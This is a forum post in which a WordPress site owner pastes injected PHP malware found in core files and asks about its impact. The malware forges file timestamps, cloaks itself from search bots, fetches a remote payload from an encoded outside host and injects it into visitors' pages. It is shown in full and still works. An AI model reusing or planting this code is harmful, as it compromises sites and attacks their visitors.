Link to home
Start Free TrialLog in
Avatar of aideb
aideb

asked on

Wordpress files have been modified - What is the impact

I have the Wordfence plugin installed on all the Wordpress sites that I have on shared hosting. I get messages occasionally that people are attempting to compromise the passwords. For that reason, the usernames are not standard e.g. no 'admin', and the passwords are complex. It also emails when an admin logs in.

This morning I got an email saying that core files had been modified.

Here is the change that was added

nction my_time($dir) {
 	    foreach (glob($dir . '/wp-*.php') as $f) {
 	  	       $times[] = filemtime($f);
 	  	}
 	  	$max = 1;
 	  	for ($i = 0; $i < count($times) - 1; $i++) {
 	  	$k = 1;
 	  	for ($j = $i + 1; $j < count($times); $j++) {
 	  	if ($times[$i] == $times[$j]) {
 	  	$k++;
 	  	if ($k > $max) {
 	  	$max = $k;
 	  	$time = $times[$i];
 	  	}
 	  	}
 	  	}
 	  	}
 	  	return $time;
 	  	}
 	  	
 	  	function my_correct($dir) {
 	  	$time = 0;
 	  	$path = $dir . '/index.php';
 	  	$content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
 	  	if (file_get_contents($path) != $content) {
 	  	chmod($path, 0644);
 	  	file_put_contents($path, $content);
 	  	chmod($path, 0444);
 	  	$time = my_time($dir);
 	  	touch($path, $time);
 	  	}
 	  	
 	  	$path = $dir . '/.htaccess';
 	  	$content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
 	  	if (file_exists($path) AND file_get_contents($path) != $content) {
 	  	chmod($path, 0644);
 	  	file_put_contents($path, $content);
 	  	chmod($path, 0444);
 	  	if (!$time) {
 	  	$time = my_time($dir);
 	  	}
 	  	touch($path, $time);
 	  	}
 	  	}
 	  	
 	  	my_correct(dirname(__FILE__) . '/..');
 	  	
 	  	function request_url_data($url) {
 	  	$site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
 	  	if (function_exists('curl_init')) {
 	  	$ch = curl_init();
 	  	curl_setopt($ch, CURLOPT_TIMEOUT, 5);
 	  	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
 	  	curl_setopt($ch, CURLOPT_URL, $url);
 	  	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 	  	curl_setopt($ch, CURLOPT_HTTPHEADER, array(
 	  	'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
 	  	'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
 	  	'Referer: ' . $site_url,
 	  	));
 	  	$response = trim(curl_exec($ch));
 	  	} elseif (function_exists('fsockopen')) {
 	  	$m = parse_url($url);
 	  	if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
 	  	fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
 	  	'Host: ' . $m['host'] . "\r\n" .
 	  	'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
 	  	'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
 	  	'Referer: ' . $site_url . "\r\n" .
 	  	'Connection: Close' . "\r\n\r\n");
 	  	$response = '';
 	  	while (!feof($fp)) {
 	  	$response .= fgets($fp, 1024);
 	  	}
 	  	list($headers, $response) = explode("\r\n\r\n", $response);
 	  	fclose($fp);
 	  	}
 	  	} else {
 	  	$response = 'curl_init and fsockopen disabled';
 	  	}
 	  	return $response;
 	  	}
 	  	
 	  	error_reporting(0);
 	  	$_passssword = '98b18acce3ce2362c1ae9afb8b28490f';
 	  	unset($_passssword);
 	  	
 	  	if (function_exists("add_action")) {
 	  	add_action('wp_head', 'add_2head');
 	  	add_action('wp_footer', 'add_2footer');
 	  	}
 	  	
 	  	function add_2head() {
 	  	ob_start();
 	  	}
 	  	
 	  	function add_2footer() {
 	  	$check = false;
 	  	$check_data = "";
 	  	if (!empty($_GET['check']) AND $_GET['check'] == '98b18acce3ce2362c1ae9afb8b28490f') {
 	  	$check = true;
 	  	$check_data = ('<!--checker_start ');
 	  	$check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
 	  	$check_data .= (' checker_end-->');
 	  	}
 	  	
 	  	if (!$check) {
 	  	if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
 	  	return;
 	  	
 	  	$cookie_name = 'PHP_SESSION_PHP';
 	  	if (isset($_COOKIE[$cookie_name]))
 	  	return;
 	  	
 	  	foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
 	  	if (preg_match($regex, $_SERVER['REQUEST_URI']))
 	  	return;
 	  	}
 	  	}
 	  	
 	  	$buffer = ob_get_clean();
 	  	ob_start();
 	  	$regexp = '/<body[^>]*>/is';
 	  	if (preg_match($regexp, $buffer, $m)) {
 	  	$body = $m[0];
 	  	$url = base64_decode('aHR0cDovL25pa2FyYWd1YS5zbHlpcC5jb20vYmxvZy8/YmY0eiZ1dG1fc291cmNlPTIwOTI0OjE0NTEyNToyNDA=');
 	  	//       if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
 	  	if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
 	  	$body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
 	  	//           $body .= base64_decode($m[0]);
 	  	$body .= $decoded;
 	  	//           $body .= base64_decode($m[0]);
 	  	}
 	  	$body .= $check_data;
 	  	
 	  	$buffer = preg_replace($regexp, $body, $buffer);
 	  	}
 	  	echo $buffer;
 	  	ob_flush();
 	  	}//iend

Open in new window


Can anyone offer some assistance to work out what the impact of this is on my sites

I updated the plugins on Friday across all sites so I am unsure how I have been compromised.

Whilst I have restored the files, I need to know if there is anything else I need to do.

Thanks
SOLUTION
Avatar of Zephyr ICT
Zephyr ICT
Flag of Belgium image
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
ASKER CERTIFIED SOLUTION
Avatar of Robert Granlund
Robert Granlund
Flag of United States of America image
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of aideb
aideb

ASKER

Sorry, Can you advise how I can re-mark?